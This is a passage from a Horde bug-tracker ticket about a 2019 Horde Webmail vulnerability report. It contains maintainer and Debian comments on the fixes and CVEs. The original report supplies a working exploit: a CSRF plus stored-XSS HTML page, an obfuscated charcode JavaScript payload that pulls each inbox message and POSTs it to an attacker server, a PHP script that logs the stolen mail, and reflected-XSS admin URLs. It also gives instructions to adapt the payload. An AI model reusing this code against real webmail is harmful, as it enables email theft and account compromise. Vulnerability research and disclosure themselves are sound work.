6.0.0-git
2019-12-06

[#14926] Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
Summary Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
Queue Horde Groupware
Queue Version 5.2.22
Type Bug
State Resolved
Priority 3. High
Owners
Requester root (at) numanozdemir (dot) com
Created 2019-05-17 (203 days ago)
Due
Updated 2019-12-04 (2 days ago)
Assigned
Resolved 2019-11-18 (18 days ago)
Milestone
Patch No

History
2019-12-04 15:10:37 roberto (at) debian (dot) org Comment #7 Reply to this comment
Thanks for the follow-up.  I also asked MITRE and they offered the 
following clarification:
The stored XSS should be considered part of the CSRF vulnerability 
in CVE-2019-12095, with the CSRF being the primary vulnerability. 
The reflected XSS vectors are all covered by CVE-2019-12094.
The CVE database entries have been updated as to be more clear.
2019-12-04 00:44:21 Michael Rubinsky Comment #6 Reply to this comment
As far as I know those are the only two issues applicable to this 
ticket. I think the third was the "exploit" of being able to obtain 
IMAP messages via GET requests, from a webmail application...
2019-12-03 02:57:18 roberto (at) debian (dot) org Comment #5 Reply to this comment
The original report included the following:
# Attacker can combine "CSRF vulnerability in Trean Bookmarks 
(defaultly installed on Horde Groupware)" and
# "Stored XSS vulnerability in Horde TagCloud (defaultly installed)" 
vulnerabilities to steal victim's emails.

# Also:
# Attacker can use 3 different reflected XSS vulnerability to 
exploit Remote Command Execution, SQL Injection and Code Execution.
I am working on updating the Horde packages in Debian LTS, also 
coordinating with the security team for an update to Debian stable, 
and so some clarification would help.

It is clear that the TagCloud XSS (CVE-2019-12094) was fixed and the 
associated commit was easy to find and applied cleanly to the Horde 
package in Debian.  It is also clear that the CSRF (CVE-2019-12095) 
has been deemed minor and not worth fixing.  However, it is not clear 
that the "3 different reflected XSS vulnerability" have been 
addressed.  Is there an additional vulnerability there beyond those 
two which received CVE assignments?  Answering this would help ensure 
that we properly track the state of Horde in Debian.
2019-11-18 20:25:44 Jan Schneider Comment #4
State ⇒ Resolved
Reply to this comment
For the record:
* The XSS in the Horde tag cloud widget had already been discovered, 
fixed, and released by ourselves with Horde 5.2.21 on April 21, before 
the report: https://lists.horde.org/archives/announce/2019/001278.html 
Without this, the whole "attack" is not exploitable.
* Adding bookmarks in Trean is indeed not CSRF protected, but that's 
low priority for us, because it's a non-destructive action.
* GETting IMAP messages from IMP is a core functionality of the 
webmail client and is hardly to be called a vulnerability. Whether it 
would make sense to token-protected such requests is at least debatable.
* The reporter irresponsibly disclosed his findings, because we were 
not willing, nor able to pay him a bounty price upfront.

Also for the records, these finding have been assigned CVE 2019-12094 
& CVE-2019-12095.

Conclusion: no Horde installation installed or updated since April 
21st 2019 is vulnerable to this exploit.

2019-05-17 20:47:23 root (at) numanozdemir (dot) com Comment #3 Reply to this comment
2019-05-17 19:59:17 root (at) numanozdemir (dot) com Comment #2 Reply to this comment
And, CVE numbers: CVE-2019-12094 and CVE-2019-12095.
2019-05-17 19:57:53 root (at) numanozdemir (dot) com Comment #1
Type ⇒ Bug
Due ⇒ 2019-05-20
Summary ⇒ Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
Priority ⇒ 3. High
State ⇒ Unconfirmed
Queue ⇒ Horde Groupware
Milestone ⇒
Patch ⇒ No
Reply to this comment
# Title: Horde Webmail - XSS + CSRF to SQLi, RCE, Stealing Emails <= v5.2.22
# Date: 14.04.2019
# Author: InfinitumIT
# Vendor Homepage: https://www.horde.org/
# Version: Up to v5.2.22.
# info@infinitumit.com.tr && infinitumit.com.tr
# PoC: https://numanozdemir.com/respdisc/horde/horde.mp4

# Description:
# Attacker can combine "CSRF vulnerability in Trean Bookmarks 
(defaultly installed on Horde Groupware)" and
# "Stored XSS vulnerability in Horde TagCloud (defaultly installed)" 
vulnerabilities to steal victim's emails.

# Also:
# Attacker can use 3 different reflected XSS vulnerability to exploit 
Remote Command Execution, SQL Injection and Code Execution.
# To steal e-mails, attacker will send an e-mail to victim and victim 
will click the attacker's website. So, victim's inbox will be dumped 
in attacker's FTP.
# All of them vulnerabillities are valid for all Horde Webmail versions.

# Attacker will exploit the CSRF and XSS with: index.html
# Attacker will steal and post the emails with: stealer.js
# Attacker will save the emails with: stealer.php

# index.html Codes:
<script>
var url = "http://webmail.victimserver.com/trean/";
var params = 
'iframe=0&popup=0&newFolder=&actionID=add_bookmark&url=http%3A%2F%2Ftest.com&title=vulnerability&description=vulnerability&treanBookmarkTags=%22%3E%3Cscript%2Fsrc%3D%22http%3A%2F%2Fyourwebsite.com%2Fhorde%2Fstealer.js%22%3E%3C%2Fscript%3E';
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type",
"application/x-www-form-urlencoded");
vuln.send(params);
</script>
<embed/src="http://webmail.victimserver.com/services/portal/"/height="1"/width="1">


# stealer.js Codes:
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,115,99,114,105,112,116,32,115,114,99,61,39,104,116,116,112,58,47,47,99,111,100,101,46,106,113,117,101,114,121,46,99,111,109,47,106,113,117,101,114,121,45,51,46,51,46,49,46,109,105,110,46,106,115,39,62,60,47,115,99,114,105,112,116,62,60,115,99,114,105,112,116,62,102,117,110,99,116,105,111,110,32,115,116,101,97,108,40,115,116,97,114,116,44,32,101,110,100,41,123,118,97,114,32,115,116,97,114,116,59,118,97,114,32,101,110,100,59,118,97,114,32,105,59,102,111,114,40,105,61,115,116,97,114,116,59,32,105,60,61,101,110,100,59,32,105,43,43,41,123,36,46,103,101,116,40,39,104,116,116,112,58,47,47,119,101,98,109,97,105,108,46,118,105,99,116,105,109,115,101,114,118,101,114,46,99,111,109,47,105,109,112,47,118,105,101,119,46,112,104,112,63,97,99,116,105,111,110,73,68,61,118,105,101,119,95,115,111,117,114,99,101,38,105,100,61,48,38,109,117,105,100,61,123,53,125,73,78,66,79,88,39,43,105,44,32,102,117,110,99,116,105,11
1,110,40,100,97,116,97,41,123,118,97,114,32,120,109,108,72,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,109,108,72,116,116,112,46,111,112,101,110,40,39,80,79,83,84,39,44,32,39,104,116,116,112,58,47,47,121,111,117,114,119,101,98,115,105,116,101,46,99,111,109,47,104,111,114,100,101,47,115,116,101,97,108,101,114,46,112,104,112,39,44,32,116,114,117,101,41,59,120,109,108,72,116,116,112,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,39,67,111,110,116,101,110,116,45,84,121,112,101,39,44,32,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,39,41,59,120,109,108,72,116,116,112,46,115,101,110,100,40,39,105,110,98,111,120,61,39,43,100,97,116,97,41,59,125,41,59,125,114,101,116,117,114,110,32,105,59,125,115,116,101,97,108,40,56,44,49,53,41,59,60,47,115,99,114,105,112,116,62,34,41,59,10,47,47,32,115,116,101,97,108,40,120,44,121,41,32,61,32,115,116,1
01,97,108,32,102,114,111,109,32,105,100,32,120,32,116,111,32,105,100,32,121))
// It is charcoded, firstly decode and edit for yourself then encode 
again. Also dont forget to remove spaces!


# stealer.php Codes:
<?php


header('Access-Control-Allow-Origin: *');

header('Access-Control-Allow-Headers: *');

if($_POST['inbox']){

$logs = fopen("inbox.txt", "a+");

$data = $_POST['inbox']." 
----------------------------------------------------------------- 
".chr(13).chr(10).chr(13).chr(10);
fwrite($logs, $data);

}


?>


_____________________________________________________________________________________________________

# Reflected XSS to Remote Command Execution, Remote Code Execution and 
SQL Injection


http://webmail.victimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=update_f
http://webmailvictimserver.com/groupware/admin/user.php?user_name=XSS-PAYLOAD-HERE&form=remove_f
http://webmail.victimserver.com/groupware/admin/config/diff.php?app=XSS-PAYLOAD-HERE

# Attacker can execute commands & PHP codes remotely and inject 
harmful SQL queries. Also, attacker can create users too with those 
reflected XSS vulnerabilities.

# Stay Secure with InfinitumIT - infinitumit.com.tr

Saved Queries